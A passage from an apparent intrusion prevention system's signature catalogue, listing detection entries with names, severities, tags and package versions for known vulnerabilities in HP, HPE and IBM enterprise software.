Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-354-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Ovalarmsrv-Integer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Network-Node-Manager-Ovalarmsrv-Service-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-707-5211
Vulnerability: HP-OpenView-Network-Node-Manager-Ovalarmsrv-Service-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Operations-A.07.50-Buffer-Overflow

About this situation: HP OpenView Operations A.07.50 Stack Based Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP OpenView, CVE2007, Windows not specific, HP OpenView not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: HP-OpenView-Operations-A.07.50-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow

About this situation: An attempt to exploit a heap buffer overflow vulnerability in HP OpenView Data Protector Cell Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Data Protector Application Recovery Manager, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-280-4219
Last changed: sgpkg-ips-280-4219
Vulnerability: HP-OpenView-Storage-Data-Protector-Cell-Manager-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Storage Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP OpenView Storage Data Protector, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in HP OpenView Storage Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP OpenView Storage Data Protector, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1747-5242
Vulnerability: HP-OpenView-Storage-Data-Protector-Exec_Cmd-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in HP OpenView Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Data Protector Application Recovery Manager, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-280-4219
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in HP OpenView Storage Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP OpenView Storage Data Protector, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2
Description:
Back to top

Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-3

About this situation: An attempt to exploit a vulnerability in HP OpenView Storage Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP OpenView Storage Data Protector, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2
Description:
Back to top

Generic_CS-HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-4

About this situation: An attempt to exploit a vulnerability in HP OpenView Storage Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, HP OpenView Storage Data Protector, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: HP-OpenView-Storage-Data-Protector-Stack-Buffer-Overflow-2
Description:
Back to top

Generic_CS-HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Operations Agent for NonStop Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Operations Agent, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Vulnerability: HP-Operations-Agent-HEALTH-Packet-Parsing-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Performance Agent detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Operations Agent, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF

About this situation: An attempt to exploit a vulnerability in HP StorageWorks File Migration Agent detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP StorageWorks File Migration Agent, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-StorageWorks-File-Migration-Agent-Rsacifs.dll-Stack-BOF
Description:
Back to top

Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP StorageWorks File Migration Agent detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP StorageWorks File Migration Agent, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-466-5211
Vulnerability: HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HP-StorageWorks-Storage-Mirroring-Buffer-Overflow-Exploit

About this situation: Exploit against a buffer overflow vulnerability in the HP StorageWorks Storage Mirroring Double Take Service over tcp detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, HP StorageWorks Storage Mirroring, CVE2008, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-156-2032
Vulnerability: HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Description:
Back to top

Generic_CS-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution

About this situation: Attempt to exploit a buffer overflow vulnerability in the HP StorageWorks Storage Mirroring Double Take Service over TCP detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP StorageWorks Storage Mirroring, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-156-2032
Vulnerability: HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Description:
Back to top

Generic_CS-HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution

About this situation: An attempt to exploit an HP StorageWorks Virtual SAN Appliance Command Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP StorageWorks Virtual SAN Appliance, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Vulnerability: HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution
Description:
Back to top

Generic_CS-HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HPE Data Protector detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2016, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-777-5211
Vulnerability: HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HPE Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2018, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write

About this situation: An HPE Intelligent Management Center Dbman FileTrans Arbitrary File Write vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, HP Intelligent Management Center, CVE2017, Windows not specific, Linux not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-937-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2018, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2018, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Zipfile-Command-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-942-5242
Last changed: sgpkg-ips-942-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-Restorezipfile-Command-Injection
HPE-Intelligent-Management-Center-Dbman-Backupzipfile-Command-Injection
Description:
Back to top

Generic_CS-HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-901-5242
Last changed: sgpkg-ips-901-5242
Vulnerability: HPE-Intelligent-Management-Center-Rmi-Registry-Insecure-Deserialization
Description:
Back to top

Generic_CS-HTTP-Multiple-Illegal-Url-Characters

About this situation: Suspicious request activity has been detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1589-5242
Description:
Back to top

Generic_CS-Hupigon.FI-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Backdoor.Hupigon-Botnet
Description:
Back to top

Generic_CS-Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HylaFax+ HylaFAX+ detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Hylafax, CVE2013, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Hylafaxplus-LDAP-Authentication-User-Name-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Cognos-Buffer-Overflow

About this situation: An attempt to exploit an IBM Cognos Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows XP SP3, Any Hardware, IBM Cognos Express, CVE2012, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: IBM-Cognos-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in IBM DB2 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM DB2, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-280-4219
Last changed: sgpkg-ips-280-4219
Vulnerability: IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service

About this situation: An IBM DB2 Universal Database Connection Handshake Denial of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM DB2, CVE2006, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service
Description:
Back to top

Generic_CS-IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM DB2 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM DB2, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM DB2 Universal Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM DB2, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Director-Agent-DOS

About this situation: An attempt to exploit a vulnerability in IBM Director Agent detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Director Agent, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-999-5242
Vulnerability: IBM-Director-Agent-DOS
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-Command-Argument-Processing-BOF

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: IBM-Informix-Dynamic-Server-Command-Argument-Processing-Stack-Overflow
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the IBM Informix Dynamic Server username vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-612-5211
Vulnerability: IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the IBM Informix Dynamic Server username vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1398-5242
Vulnerability: IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: IBM-Informix-Dynamic-Server-Librpc.dll-Multiple-Buffer-Overflows
Description:
Back to top

Generic_CS-IBM-solidDB-Denial-Of-Service

About this situation: A vulnerability in IBM SolidDB allowing denial of service.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, IBM SolidDB, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: IBM-solidDB-Denial-Of-Service
Description:
Back to top

Generic_CS-IBM-solidDB-Logging-Function-Format-String

About this situation: Attempt to exploit a format string vulnerability in the IBM solidDB database server product detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM SolidDB, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-156-2032
Vulnerability: IBM-solidDB-Logging-Function-Format-String
Description:
Back to top

Generic_CS-IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service

About this situation: An IBM solidDB Redundant Where Clause Denial Of Service vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Solaris, Linux, Any Hardware, IBM SolidDB, CVE2012, Windows not specific, Solaris not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service
Description:
Back to top

Generic_CS-IBM-solidDB-Rownum-Subquery-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in IBM SolidDB detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM SolidDB, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: IBM-solidDB-Rownum-Subquery-Denial-Of-Service
Description:
Back to top

Generic_CS-IBM-solidDB-Solid.exe-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in IBM SolidDB detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, IBM SolidDB, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: IBM-solidDB-Solid.exe-Authentication-Bypass
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager Client detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager Client, IBM Tivoli Storage Manager Express Client, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-269-3038
Vulnerability: IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager (TSM) Enterprise Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager Enterprise Server, IBM Tivoli Storage Manager Express Server, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-472-5211
Vulnerability: IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service-CVE-2015-8523

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1868-5242
Last changed: sgpkg-ips-1868-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
